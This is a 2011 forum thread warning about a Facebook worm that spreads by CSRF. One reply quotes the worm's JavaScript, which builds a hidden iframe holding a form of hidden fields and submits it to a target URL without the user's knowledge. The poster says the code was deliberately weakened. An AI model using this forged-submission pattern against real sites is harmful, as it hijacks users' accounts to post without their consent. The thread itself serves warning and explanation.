Bitcoin Forum
December 09, 2016, 07:58:33 AM *
News: Latest stable version of Bitcoin Core: 0.13.1  [Torrent].
 
   Home   Help Search Donate Login Register  
Pages: [1]
  Print  
Author Topic: XSS / CSFR Facebook hostile-page  (Read 862 times)
BCEmporium
Legendary
*
Offline Offline

Activity: 938



View Profile
July 03, 2011, 11:31:31 PM
 #1

For people keeping wondering about XSS and CSRF, here's an example of what it can do. This example is a new Facebook worm, which spreads by pointing users at this page: hxxp://greatlolfacehot.com/ (link replaced with hxxp - Make sure you've Javascript disabled before you try it, then you can look at the source.

This is also a warning, just in case of a friend of yours had post some crap alike to his or your wall.
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction. Advertise here.
1481270313
Hero Member
*
Offline Offline

Posts: 1481270313

View Profile Personal Message (Offline)

Ignore
1481270313
Reply with quote  #2

1481270313
Report to moderator
1481270313
Hero Member
*
Offline Offline

Posts: 1481270313

View Profile Personal Message (Offline)

Ignore
1481270313
Reply with quote  #2

1481270313
Report to moderator
1481270313
Hero Member
*
Offline Offline

Posts: 1481270313

View Profile Personal Message (Offline)

Ignore
1481270313
Reply with quote  #2

1481270313
Report to moderator
joepie91
Sr. Member
****
Offline Offline

Activity: 294


View Profile
July 06, 2011, 05:16:49 PM
 #2

Sharing the part that does the CSRF here, for those who are interested...

Code:
function jacks(site,params){
var div = document.createElement('div');
div.innerHTML = '<iframe></iframe>';
document.body.appendChild(div);
var iframe = div.firstChild;
var iframeDocument = iframe.documentHandler;
iframeDocument.open();
iframeDocument.close();
var form = iframeDocument.createElement('form');
iframeDocument.body.appendChild(form);
form.setAttribute('action',site);
for (param in params){
var field = iframeDocument.createElement('input');
field.setAttribute('type', 'hidden');
field.setAttribute('name', param);
field.setAttribute('value', params[param]);
form.appendChild(field);
}
form.submit();
}
What this code roughly does is creating an iframe with a form that is set to a specific Facebook sharing URL (that is also called by their on-site sharing functionality), inserting a specific set of "parameters" (form fields) and corresponding values, and automatically submits the forum. This is all done in the background of course. The target URL and parameters can be specified in this function.

The code I posted here was edited to need some work before it works, to discourage script kiddies.

EDIT: Of course this could be executed from any page. You could be visiting some random page with comics, and it could technically have this code in it.

Like my post(s)? 12TSXLa5Tu6ag4PNYCwKKSiZsaSCpAjzpu Smiley
Quote from: hawks5999
I just can't wait for fall/winter. My furnace never generated money for me before. I'll keep mining until my furnace is more profitable.
Pages: [1]
  Print  
 
Jump to:  

Sponsored by , a Bitcoin-accepting VPN.
Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!